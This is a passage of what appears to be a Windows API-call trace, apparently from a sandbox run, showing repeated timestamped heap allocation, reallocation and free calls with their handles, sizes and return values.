lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.980] GetProcessHeap () returned 0x280000 [0057.980] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.980] GetProcessHeap () returned 0x280000 [0057.981] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.981] GetProcessHeap () returned 0x280000 [0057.981] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.981] GetProcessHeap () returned 0x280000 [0057.982] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.982] GetProcessHeap () returned 0x280000 [0057.982] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.983] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47b78, Size=0x84) returned 0x2f3f20 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b78 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b88 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47b98 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b88 | out: hHeap=0x280000) returned 1 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47b88 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b98 | out: hHeap=0x280000) returned 1 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47b98 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b88 | out: hHeap=0x280000) returned 1 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47b88 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b98 | out: hHeap=0x280000) returned 1 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47b98 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b88 | out: hHeap=0x280000) returned 1 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47b88 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b98 | out: hHeap=0x280000) returned 1 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47b98 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b88 | out: hHeap=0x280000) returned 1 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47b88 [0057.983] GetProcessHeap () returned 0x280000 [0057.983] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b98 | out: hHeap=0x280000) returned 1 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47b98 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b88 | out: hHeap=0x280000) returned 1 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47b88 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b98 | out: hHeap=0x280000) returned 1 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x10) returned 0x7d3f598 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b88 | out: hHeap=0x280000) returned 1 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x14) returned 0x2eb8e0 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d3f598 | out: hHeap=0x280000) returned 1 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x2cef38 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2eb8e0 | out: hHeap=0x280000) returned 1 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d75900 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2cef38 | out: hHeap=0x280000) returned 1 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d4a9b0 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d75900 | out: hHeap=0x280000) returned 1 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d4aa40 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d4a9b0 | out: hHeap=0x280000) returned 1 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x78) returned 0x2e6d30 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d4aa40 | out: hHeap=0x280000) returned 1 [0057.984] GetProcessHeap () returned 0x280000 [0057.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x7c) returned 0x2e17a0 [0057.984] GetProcessHeap () returned 0x280000 [0057.985] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e6d30 | out: hHeap=0x280000) returned 1 [0057.985] GetProcessHeap () returned 0x280000 [0057.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xf0) returned 0x7d1ad18 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xf0) returned 0x2b0f30 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d1ad18 | out: hHeap=0x280000) returned 1 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.990] GetProcessHeap () returned 0x280000 [0057.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.991] GetProcessHeap () returned 0x280000 [0057.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.991] GetProcessHeap () returned 0x280000 [0057.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.992] GetProcessHeap () returned 0x280000 [0057.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.993] GetProcessHeap () returned 0x280000 [0057.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0057.994] GetProcessHeap () returned 0x280000 [0057.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0057.994] GetProcessHeap () returned 0x280000 